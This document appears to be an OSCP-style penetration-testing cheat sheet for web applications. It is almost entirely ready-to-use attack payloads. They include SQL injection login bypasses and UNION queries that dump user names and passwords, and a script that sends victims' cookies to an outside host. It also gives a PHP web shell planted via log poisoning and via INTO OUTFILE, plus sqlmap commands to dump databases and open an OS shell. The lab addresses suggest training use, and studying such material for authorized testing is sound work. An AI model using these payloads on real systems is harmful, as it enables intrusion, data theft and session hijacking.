
Oscp - Spider Web Applications

General

Try reading the PHP source code of the web application:
http://<ip>/script.php/?-s
Did Nikto report any LFI/RFI vulnerability? Try
fimap -u <ip-address>
Check for input validation in forms:
1' or 1=1 limit 1;#   AND   1' or 1=1--)

Stealing Cookies

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
<script> new Image().src="http://10.11.0.5/bogus.php?output="+document.cookie; </script>

File Inclusion Vulnerabilities

php.ini values:
register_globals  allow_url  allow_url_fopen  allow_url_include
Terminate our request with a null byte (%00) (possible in PHP below 5.3).
For LFI/RFI attacks, this might be useful:
https://github.com/lightos/Panoptic/

Contaminating Log Files

Contaminate the log file so that it contains PHP code, to be used later in an LFI attack:
nc -nv 192.168.30.35 80
<?php echo shell_exec($_GET['cmd']);?>
So cmd= is introduced into the PHP execution, and now by including the logfile you can execute any command.

SQL Injection

Classic Authentication Bypass
select * from users where name='any' or 1=1;#'
select * from users where name='any' or 1=1 limit 1;#'

Error Based Enum

order by
union all operator → allows us to add our own select queries to the original, but the new select needs to have the same number of columns as the original column statement
union all select 1,2,3,4,5,6
union all select 1,2,3,4,@@version,6
union all select 1,2,3,4,user(),6
union all select 1,2,3,4,table_name,6 FROM information_schema.tables
union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union select 1,2,name,4,password,6 FROM users
OR
http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users

Blind SQL Injection

and 1=1;#   and 1=2;#
If they give different results, that is an indication of a possible injection location.
Use time as a test parameter for the query:
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

SQLMap

sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell

Modify HTTP Headers

Install the addon "Modify Headers".
In some cases, to look like you have a different IP, you can change the value of the X-Forwarded-For header:
https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm